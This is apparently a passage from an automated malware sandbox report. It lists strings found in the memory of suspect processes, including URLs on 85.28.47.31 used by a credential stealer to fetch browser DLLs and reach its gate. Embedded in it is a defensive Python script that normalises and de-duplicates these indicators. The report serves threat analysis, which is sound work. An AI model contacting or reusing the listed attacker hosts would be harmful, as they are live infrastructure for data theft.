Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/mozglue.dllaY6C
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll
Source: file.exe, 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/msvcp140.dll&
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/nss3.dll
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dll
Source: file.exe, 00000000.00000002.2435800238.0000000028D63000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/softokn3.dllk
Source: file.exe, 00000000.00000002.2418643006.000000000046A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2420117641.00000000026D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll;
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/SSC:
Source: file.exe, 00000000.00000002.2420117641.000000000270C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/U
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/Uv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/dows
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/gv
Source: ba77748b9b.exe, 00000016.00000002.2778366166.000000000280B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31/sv
Source: file.exe, 00000000.00000002.2418643006.00000000005AD000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://85.28.47.315499d72b3a3e55be.phposition:
Source: ba77748b9b.exe, 00000016.00000002.2778366166.00000000027D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.31L
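The run of 85.28.47.31 strings above shows a typical memory-carving artifact: the same URL appears a dozen times with different tails (`.phpKP`, `.phpS`, `.dlleZ2B`, `31L`) because the carved string was not NUL-terminated and the carver read on into adjacent bytes. The following script is an added example, not part of the Joe Sandbox report: it parses findings lines of this shape, trims the junk after a recognised file extension or dotted-quad host, collapses the variants onto one IOC per host and path, and drops well-known benign infrastructure (CRL/OCSP endpoints, XML schema namespaces) that every browser or .NET process carries. The extension list, the IPv4-prefix rule and the benign-host allowlist are the example's own triage heuristics; the sample lines are copied in shape from the findings above with the dump identifiers abbreviated.

```python
"""Extract and de-duplicate network IOCs from "String found in binary or memory"
findings (Joe Sandbox style).  Added example; heuristics are the author's own."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# One finding per line: "Source: <proc>, <dump ids> String found in binary or memory: <url>"
FINDING_RE = re.compile(
    r"^Source:\s+(?P<proc>[^,]+?),.*?String found in binary or memory:\s+(?P<url>https?://\S+)"
)

# Anything after one of these extensions is assumed to be carving junk (heuristic).
EXT_RE = re.compile(r"^(?P<path>.*?\.(?:php|exe|dll|crl|crt|cer|txt|html?))(?P<junk>.*)$", re.I)

# If the host starts with a dotted quad, trailing characters are junk ("85.28.47.31L").
OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
IPV4_PREFIX = re.compile(rf"^({OCTET}(?:\.{OCTET}){{3}})")

# Benign infrastructure to drop: CA revocation hosts, XML/SOAP namespaces, installer
# and browser telemetry.  This allowlist is the example's own judgement, not the report's.
BENIGN_SUFFIXES = (
    "digicert.com", "globalsign.com", "amazontrust.com", "mozilla.org",
    "firefox.com", "docs.oasis-open.org", "schemas.xmlsoap.org", "exslt.org", "nsis.sf.net",
)

# Constructed sample: findings copied in shape from the report, dump ids shortened.
SAMPLE_FINDINGS = """\
Source: file.exe, 00000000.00000002.2420117641.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exeM
Source: file.exe, 00000000.00000002.2435800238.sdmp String found in binary or memory: http://185.215.113.16/soka/random.exe
Source: ba77748b9b.exe, 00000016.00000002.2778366166.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpKP
Source: file.exe, 00000000.00000002.2420117641.sdmp String found in binary or memory: http://85.28.47.31/5499d72b3a3e55be.phpS
Source: file.exe, 00000000.00000002.2420117641.sdmp String found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B
Source: ba77748b9b.exe, 00000016.00000002.2778366166.sdmp String found in binary or memory: http://85.28.47.31L
Source: ba77748b9b.exe, 00000016.00000002.2778366166.sdmp String found in binary or memory: http://85.28.47.31/1vfQ
Source: firefox.exe, 00000028.00000002.2914617240.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.sdmp, Buyer.pif.23.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: global traffic DNS traffic detected: DNS query: vaniloin.fun
"""


def parse_finding(line):
    """Return (process, url) for a findings line, or None for any other line."""
    m = FINDING_RE.match(line.strip())
    if not m:
        return None
    return m.group("proc").strip(), m.group("url")


def normalize_url(url):
    """Trim carving junk.  Returns (clean_url, certain); certain is False when the
    path has no recognised ending and may itself be partial or junk ("/1vfQ")."""
    parts = urlsplit(url)
    host = parts.netloc.lower()
    ip = IPV4_PREFIX.match(host)
    if ip:
        host = ip.group(1)          # drop bytes carved past the end of the IP literal
    base = f"{parts.scheme}://{host}"
    if parts.path in ("", "/"):
        return base, True           # bare host: the C2 itself, nothing to trim
    m = EXT_RE.match(parts.path)
    if m:
        return base + m.group("path"), True
    return base + parts.path, False  # query strings are deliberately dropped


def is_benign(host):
    host = host.split(":")[0]
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)


def summarize(text):
    """Group findings by host: referencing processes, confident paths, uncertain paths."""
    hosts = defaultdict(lambda: {"processes": set(), "paths": set(), "uncertain": set()})
    for line in text.splitlines():
        parsed = parse_finding(line)
        if parsed is None:
            continue
        proc, raw = parsed
        url, certain = normalize_url(raw)
        host = urlsplit(url).netloc
        if is_benign(host):
            continue
        entry = hosts[host]
        entry["processes"].add(proc)
        (entry["paths"] if certain else entry["uncertain"]).add(url)
    return dict(hosts)


if __name__ == "__main__":
    for host, entry in sorted(summarize(SAMPLE_FINDINGS).items()):
        print(host, "<-", ", ".join(sorted(entry["processes"])))
        for url in sorted(entry["paths"]):
            print("   ", url)
        for url in sorted(entry["uncertain"]):
            print("   ", url, "(unverified path)")
```

Run against the full findings list, the seven 85.28.47.31 strings in the sample collapse to the bare host, the `/5499d72b3a3e55be.php` gate and the `/8405906461a5200c/sqlite3.dll` download, with `/1vfQ` kept aside as unverified rather than silently promoted to an indicator; the DNS line and the DigiCert/GlobalSign CRL strings are ignored. Treat the "uncertain" bucket as leads to confirm against the PCAP, not as IOCs to block.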
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://www.inbox.lv/rfc2368/?value=%s
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000028.00000002.2882551286.000002618E681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times$
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000028.00000002.2882551286.000002618E681000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000028.00000002.2882551286.000002618E624000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000028.00000002.2917052824.00000261936E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2884438644.000002618E7B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2919086701.0000026193AC5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903918367.0000026192703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2903042607.00000261926FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2917052824.00000261936D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2902396300.0000026192403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: PharmaciesDetection.exe, 00000015.00000000.2653080912.0000000000408000.00000002.00000001.01000000.00000010.sdmp, PharmaciesDetection.exe, 00000015.00000002.2680053271.0000000000408000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: firefox.exe, 00000028.00000002.2914617240.0000026193241000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PharmaciesDetection.exe, 00000015.00000003.2676190979.00000000027AC000.00000004.00000020.00020000.00000000.sdmp, Buyer.pif.23.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002B91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
